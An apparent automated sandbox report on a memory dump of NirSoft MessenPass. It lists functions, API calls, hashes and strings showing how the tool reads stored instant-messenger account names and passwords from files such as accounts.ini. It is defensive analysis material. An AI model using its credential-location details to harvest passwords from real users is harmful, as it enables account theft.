                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00406ED6, Relevance: 1.5, APIs: 1, Instructions: 17fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2738559852-0
                                                                                                    • Opcode ID: a90c0f663160ddd1806211c67689bb6444212dacbbb8cc2b1f9417cee627f633
                                                                                                    • Instruction ID: aa4cf13b5f890a7c287dc17e2503e7ef9553656c8147c817b9e920ceb3cbd6db
                                                                                                    • Opcode Fuzzy Hash: a90c0f663160ddd1806211c67689bb6444212dacbbb8cc2b1f9417cee627f633
                                                                                                    • Instruction Fuzzy Hash: 21E0173691020CFBDF12CF80CC05FEEBBB9EB04B04F204068B901A62A0C7759E10EB98
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004067D3, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040A792,00000000), ref: 004067E5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 96ee2d3e2a5f08fb7e0664ffc2d87f5ef5a690df2876f5604083955e74d05a1c
                                                                                                    • Instruction ID: 92edde76bd8748fbe9720986c638c7b7c767b624a816766c44db5ce3c9f9c76e
                                                                                                    • Opcode Fuzzy Hash: 96ee2d3e2a5f08fb7e0664ffc2d87f5ef5a690df2876f5604083955e74d05a1c
                                                                                                    • Instruction Fuzzy Hash: 18C012F0790300BEFF214B10AE0EFB7355DD7C0700F1084207E40E80E0C2E14C008524
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004067BA, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: d56762f5ff07e452d55025f92145a06934d9f9e83bc165fc514a96713f281235
                                                                                                    • Instruction ID: 6b5441a44151c9e47baf98361d0eca158f6ada1b16bcce3b9b94d573676807d0
                                                                                                    • Opcode Fuzzy Hash: d56762f5ff07e452d55025f92145a06934d9f9e83bc165fc514a96713f281235
                                                                                                    • Instruction Fuzzy Hash: 63C092B0690200BEFE224A10AE19FB6255DD780700F2044247E40E80E0C1A14D108524
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00404CE0, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: 09654d27d92bbbd4347e31d37517ef01c67619c045b00d8d4426f03fbba466b4
                                                                                                    • Instruction ID: e399220ee4d6b13c72a3c0d8b1802730825471fdce5c5047c746ffbeb5b4c0d0
                                                                                                    • Opcode Fuzzy Hash: 09654d27d92bbbd4347e31d37517ef01c67619c045b00d8d4426f03fbba466b4
                                                                                                    • Instruction Fuzzy Hash: 95C09B71111701CBF7214F50C948793B7F4BF40717F50485C95D5D5080D77CD554DA18
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00412111, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EnumResourceNamesA.KERNEL32(?,?,Function_0001208B,00000000), ref: 00412120
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: EnumNamesResource
                                                                                                    • String ID:
                                                                                                    • API String ID: 3334572018-0
                                                                                                    • Opcode ID: ba829d88c3412ff21df67adf2b83c510d22bc263701ca9dedf1e72494c089302
                                                                                                    • Instruction ID: 035a6a4498e4538559194e0194001357af3b3daa9477d160ae033d236808df75
                                                                                                    • Opcode Fuzzy Hash: ba829d88c3412ff21df67adf2b83c510d22bc263701ca9dedf1e72494c089302
                                                                                                    • Instruction Fuzzy Hash: F1C09B31594741D7D7119F608D05F5B7E95BB9C701F114D397355D40A4D7514024D605
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407930, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindClose.KERNELBASE(?,00407846,00000000,?,?,?,004042E3,?), ref: 0040793A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: CloseFind
                                                                                                    • String ID:
                                                                                                    • API String ID: 1863332320-0
                                                                                                    • Opcode ID: 7e54cd433b5ce253bc2727deb76d35bdd44679d6989c35a24742b702d722518c
                                                                                                    • Instruction ID: 0badf10416d1e61bd1c3ad237588f2502b9813823e024cd162efce7da5e32b0f
                                                                                                    • Opcode Fuzzy Hash: 7e54cd433b5ce253bc2727deb76d35bdd44679d6989c35a24742b702d722518c
                                                                                                    • Instruction Fuzzy Hash: B5C09270A109019BE22C5F38EC5986E77E1AF8A3343B45F6CA0F3E20F0E73895428A04
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00411D68, Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID:
                                                                                                    • API String ID: 71445658-0
                                                                                                    • Opcode ID: b465aea9c7eaf0091ba49f462bc8b3cd6046f75692c30915c3b30d88ca534391
                                                                                                    • Instruction ID: ce7f413466e1863fe1078dd7deec7b9c9a94e59086d3684c19d06f0563d6b072
                                                                                                    • Opcode Fuzzy Hash: b465aea9c7eaf0091ba49f462bc8b3cd6046f75692c30915c3b30d88ca534391
                                                                                                    • Instruction Fuzzy Hash: 5CC09235548301FFDE128F80EE0AF4ABFA2BBC8B05F508818B284240B1C2728824EB57
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004069D3, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: 77a73d6f288b94d7a7248812d8204c1d44c35e38f391bb5ddf3e052da3bda440
                                                                                                    • Instruction ID: 66443cf59350c8d7b1baefe17900325ca04844ca679cc43594c3e66389cfa9db
                                                                                                    • Opcode Fuzzy Hash: 77a73d6f288b94d7a7248812d8204c1d44c35e38f391bb5ddf3e052da3bda440
                                                                                                    • Instruction Fuzzy Hash: 48B012752104009BCB090B34DD451CD35505F84631720473CB033C40F0E720CC60BA00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Non-executed Functions

                                                                                                    Function 0040BA30, Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 0040BA4A
                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040BA5C
                                                                                                    • GetTempFileNameA.KERNEL32(?,00418628,00000000,?), ref: 0040BA7E
                                                                                                    • OpenClipboard.USER32(?), ref: 0040BA9E
                                                                                                    • GetLastError.KERNEL32 ref: 0040BAB7
                                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040BAD4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 2014771361-0
                                                                                                    • Opcode ID: bc4e754206438fbec1c043f7d2b58fad48fd6537ef89688e957de5baac6cac8f
                                                                                                    • Instruction ID: 5bfde055311aa1c1ac8a047c999dbef42aa9d8293b3a95092e24ac928ebec7a0
                                                                                                    • Opcode Fuzzy Hash: bc4e754206438fbec1c043f7d2b58fad48fd6537ef89688e957de5baac6cac8f
                                                                                                    • Instruction Fuzzy Hash: E9115276600218ABDB609BA1DC49FCB77BCAB54701F0040B6B69AE2091DBB499C58F68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00406B06, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetVersionExA.KERNEL32(0041E160,?,00406B2F,0040261A), ref: 00406B20
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Version
                                                                                                    • String ID: `A
                                                                                                    • API String ID: 1889659487-1337903584
                                                                                                    • Opcode ID: 89848a9a064684b9105e07163e2dbe6bd78a8fd97e7dba8b0dce623eab9b2175
                                                                                                    • Instruction ID: da77bcce2c8e52e385cf56c8afe7a40ad3a24cfb33d571a5ca18312b8fc7eb0c
                                                                                                    • Opcode Fuzzy Hash: 89848a9a064684b9105e07163e2dbe6bd78a8fd97e7dba8b0dce623eab9b2175
                                                                                                    • Instruction Fuzzy Hash: 8EC00279911225EBD6205B59BD08BC677A8A74D355F018476A901A2264C3F81C45C799
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00412768, Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • strlen.MSVCRT ref: 00412B87
                                                                                                    • _strncoll.MSVCRT ref: 00412B97
                                                                                                    • memcpy.MSVCRT ref: 00412C13
                                                                                                    • atoi.MSVCRT ref: 00412C24
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00412C50
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide_strncollatoimemcpystrlen
                                                                                                    • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                    • API String ID: 1864335961-3210201812
                                                                                                    • Opcode ID: 4454015bb34ad17b627a5be0e2725abbe23317b8734bfa8cf262dd92011da116
                                                                                                    • Instruction ID: 3bd07b0f0ec87f02ccef6cae80a33f2a43e47736a5c113f17b6628cc3434821e
                                                                                                    • Opcode Fuzzy Hash: 4454015bb34ad17b627a5be0e2725abbe23317b8734bfa8cf262dd92011da116
                                                                                                    • Instruction Fuzzy Hash: 3BF125B1C042989EDF25CF94C9687DDBBB1AB05308F1481CAD8596B242D7B84ECACF5C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004117B1, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 004117DE
                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004117EA
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 004117F9
                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 00411805
                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 0041180E
                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 0041181A
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041182C
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00411837
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041184B
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00411859
                                                                                                    • GetDC.USER32 ref: 00411892
                                                                                                    • strlen.MSVCRT ref: 004118D2
                                                                                                    • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 004118E3
                                                                                                    • ReleaseDC.USER32(?,?), ref: 00411930
                                                                                                    • sprintf.MSVCRT ref: 004119F0
                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00411A04
                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 00411A22
                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00411A58
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00411A68
                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00411A76
                                                                                                    • GetClientRect.USER32(?,?), ref: 00411A8D
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00411A97
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00411ADD
                                                                                                    • GetClientRect.USER32(?,?), ref: 00411AE7
                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00411B1F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                    • API String ID: 1703216249-3046471546
                                                                                                    • Opcode ID: aed0d2fc460153e712b5f87657be857b759c42e44ee73449b635be24a1b57749
                                                                                                    • Instruction ID: b52727e0d403183305b875c614282f55299ec8bf2f46e0c3c56b37a88aeefe3f
                                                                                                    • Opcode Fuzzy Hash: aed0d2fc460153e712b5f87657be857b759c42e44ee73449b635be24a1b57749
                                                                                                    • Instruction Fuzzy Hash: B2B1DF72108341AFD711DF68C985AABBBE9FF88704F00492DFA9993261DB75E904CF16
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004105A6, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 213windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EndDialog.USER32(?,?), ref: 004105EE
                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00410606
                                                                                                    • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00410625
                                                                                                    • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 00410632
                                                                                                    • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0041063B
                                                                                                    • memset.MSVCRT ref: 00410663
                                                                                                    • memset.MSVCRT ref: 00410683
                                                                                                    • memset.MSVCRT ref: 004106A1
                                                                                                    • memset.MSVCRT ref: 004106BA
                                                                                                    • memset.MSVCRT ref: 004106D8
                                                                                                    • memset.MSVCRT ref: 004106F1
                                                                                                    • GetCurrentProcess.KERNEL32 ref: 004106F9
                                                                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041071E
                                                                                                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 00410754
                                                                                                    • memset.MSVCRT ref: 0041078F
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 0041079D
                                                                                                    • memcpy.MSVCRT ref: 004107CC
                                                                                                    • _mbscpy.MSVCRT ref: 004107EE
                                                                                                    • sprintf.MSVCRT ref: 00410859
                                                                                                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 00410872
                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0041087C
                                                                                                    • SetFocus.USER32(00000000), ref: 00410883
                                                                                                    Strings
                                                                                                    • {Unknown}, xrefs: 00410668
                                                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 00410853
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                    • API String ID: 1428123949-3474136107
                                                                                                    • Opcode ID: dfc1cacd1db7b3e5e31f88e82e27deeb72c9f49ab4d69ff4c670fff32b5d8099
                                                                                                    • Instruction ID: 62e2ad0b84330276400548424eb425e056568d51af16bfff45d60a010caf4195
                                                                                                    • Opcode Fuzzy Hash: dfc1cacd1db7b3e5e31f88e82e27deeb72c9f49ab4d69ff4c670fff32b5d8099
                                                                                                    • Instruction Fuzzy Hash: 1D7108B2804248FFD721DF51EC45EDB7BACEF48344F04443EF54892160EA759A94CBA9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040B4F6, Relevance: 37.0, APIs: 14, Strings: 7, Instructions: 286windowregistrystringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00408A29: LoadMenuA.USER32(00000000), ref: 00408A31
                                                                                                      • Part of subcall function 00408A29: sprintf.MSVCRT ref: 00408A54
                                                                                                    • SetMenu.USER32(?,00000000), ref: 0040B61C
                                                                                                    • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040B64F
                                                                                                    • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040B667
                                                                                                    • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040B6C7
                                                                                                    • _strcmpi.MSVCRT ref: 0040B799
                                                                                                    • RegDeleteKeyA.ADVAPI32(80000001,Software\NirSoft\MessenPass), ref: 0040B7AE
                                                                                                    • SetFocus.USER32(?), ref: 0040B7E1
                                                                                                    • GetFileAttributesA.KERNEL32(0041E678), ref: 0040B7FB
                                                                                                    • GetTempPathA.KERNEL32(00000104,0041E678), ref: 0040B80B
                                                                                                    • strlen.MSVCRT ref: 0040B812
                                                                                                    • strlen.MSVCRT ref: 0040B820
                                                                                                    • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040B86D
                                                                                                      • Part of subcall function 00404E68: strlen.MSVCRT ref: 00404E85
                                                                                                      • Part of subcall function 00404E68: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404EA9
                                                                                                    • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040B8DD
                                                                                                    • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040B8F0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$strlen$LoadMenu$AttributesClipboardCreateDeleteFileFocusFormatImagePathRegisterTempWindow_strcmpisprintf
                                                                                                    • String ID: /noloadsettings$/sm$Software\NirSoft\MessenPass$SysListView32$commdlg_FindReplace$report.html$xA
                                                                                                    • API String ID: 2862451953-132385428
                                                                                                    • Opcode ID: ea6126f0ad9a3bdd701ee80c8346164e4811f452d9b02224669d18572419d2bb
                                                                                                    • Instruction ID: 58ee6bec69cc5a2ead352e1dc17fbc33d0493dc4f48ef93b1c15430ab04c662e
                                                                                                    • Opcode Fuzzy Hash: ea6126f0ad9a3bdd701ee80c8346164e4811f452d9b02224669d18572419d2bb
                                                                                                    • Instruction Fuzzy Hash: 4FC1F271500244EFEB129F64C84ABDA7FA5EF54708F04407EFA446F2D2CBB95944CBA9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040F689, Relevance: 35.2, APIs: 12, Strings: 8, Instructions: 192COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040F94E: SetFilePointer.KERNEL32(0040F292,?,00000000,00000000,00418AF8,00000000,?,?,0040F8C4,?,00000000,?,76022EE0), ref: 0040F968
                                                                                                      • Part of subcall function 0040F94E: memset.MSVCRT ref: 0040F973
                                                                                                    • _strcmpi.MSVCRT ref: 0040F729
                                                                                                    • _strcmpi.MSVCRT ref: 0040F740
                                                                                                    • _strcmpi.MSVCRT ref: 0040F757
                                                                                                    • _strcmpi.MSVCRT ref: 0040F76E
                                                                                                    • _strcmpi.MSVCRT ref: 0040F792
                                                                                                    • _strcmpi.MSVCRT ref: 0040F7A6
                                                                                                    • _strcmpi.MSVCRT ref: 0040F7BA
                                                                                                    • _strcmpi.MSVCRT ref: 0040F7CE
                                                                                                    • _strcmpi.MSVCRT ref: 0040F7E2
                                                                                                    • _mbscpy.MSVCRT ref: 0040F831
                                                                                                    • _strcmpi.MSVCRT ref: 0040F843
                                                                                                    • _mbscpy.MSVCRT ref: 0040F88E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _strcmpi$_mbscpy$FilePointermemset
                                                                                                    • String ID: LoginName$UIN$e-mail$gg_1$icq$icq_1$password$yahoo_id
                                                                                                    • API String ID: 3770779768-1670397801
                                                                                                    • Opcode ID: 35a2a10a4a641d2086cb2dbdba6566c00143c3982c3012e31156ad73f44fce61
                                                                                                    • Instruction ID: 0cc2e13a8e56b2c188e74045540a3fe2ab2ea4ed6cca8b10f1d7ecee0d286665
                                                                                                    • Opcode Fuzzy Hash: 35a2a10a4a641d2086cb2dbdba6566c00143c3982c3012e31156ad73f44fce61
                                                                                                    • Instruction Fuzzy Hash: 795177725043096EEB21DAA2DC81EEA73AC9F04715F60447FF505E25C1EB38EB89879D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040244D, Relevance: 33.4, APIs: 7, Strings: 12, Instructions: 132COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040246E
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000400,00000000,00000000), ref: 0040248C
                                                                                                      • Part of subcall function 004029D9: strlen.MSVCRT ref: 004029E6
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004024B9
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004024C8
                                                                                                    • memcpy.MSVCRT ref: 004025B4
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004025F4
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004025FC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@$ByteCharMultiWidememcpymemsetstrlen
                                                                                                    • String ID: '$)$)$0$5$:$G$W$X$[$[$f
                                                                                                    • API String ID: 3606715663-4187034442
                                                                                                    • Opcode ID: 0c1ead281ec529b2204c21758b478f212f128851a43b0ebebe7386bd97e06504
                                                                                                    • Instruction ID: d66295c9476db63dbc5c32b0f61e30ac1af87f583ef6fa4ed04bb8f7da70bc00
                                                                                                    • Opcode Fuzzy Hash: 0c1ead281ec529b2204c21758b478f212f128851a43b0ebebe7386bd97e06504
                                                                                                    • Instruction Fuzzy Hash: 98514C218087CEDDDB22D7BC98486DEBF745F26224F0843D9E1E47B2D2D265064AC77A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040E0A1, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 142stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040E0C7
                                                                                                    • strlen.MSVCRT ref: 0040E0CF
                                                                                                    • strlen.MSVCRT ref: 0040E0DB
                                                                                                    • GetPrivateProfileIntA.KERNEL32(Accounts,num,00000000,?), ref: 0040E11A
                                                                                                    • memset.MSVCRT ref: 0040E146
                                                                                                    • memset.MSVCRT ref: 0040E15A
                                                                                                    • memset.MSVCRT ref: 0040E16E
                                                                                                    • memset.MSVCRT ref: 0040E182
                                                                                                    • memset.MSVCRT ref: 0040E196
                                                                                                    • sprintf.MSVCRT ref: 0040E1AA
                                                                                                    • GetPrivateProfileStringA.KERNEL32(?,Account,00417C88,?,000003FF,?), ref: 0040E1D8
                                                                                                    • GetPrivateProfileStringA.KERNEL32(?,Password,00417C88,?,000003FF,?), ref: 0040E1FA
                                                                                                      • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                                                                                      • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memset$PrivateProfile$Stringstrlen$_mbscat_mbscpysprintf
                                                                                                    • String ID: Account$Account%3.3d$Accounts$Password$accounts.ini$num
                                                                                                    • API String ID: 1850607429-3672167483
                                                                                                    • Opcode ID: 574f83c5b41ac8dd83ff1764a4dea53749887e014cb38c5e2b2be6ead15973e1
                                                                                                    • Instruction ID: 3695b6fee04a76e8e88970007e36b309292cfce1d28ac10fc6c7acbfdb1ec453
                                                                                                    • Opcode Fuzzy Hash: 574f83c5b41ac8dd83ff1764a4dea53749887e014cb38c5e2b2be6ead15973e1
                                                                                                    • Instruction Fuzzy Hash: A25193B184026CBECB10DB54DC86EDA77BCAF55304F1044FAB508E3141DA789FC98BA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040EE6A, Relevance: 31.6, APIs: 11, Strings: 10, Instructions: 127COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _strcmpi
                                                                                                    • String ID: aim$aim_1$gg_1$icq$icq_1$jabber$jabber_1$msn$msn_1$yahoo
                                                                                                    • API String ID: 1439213657-55676784
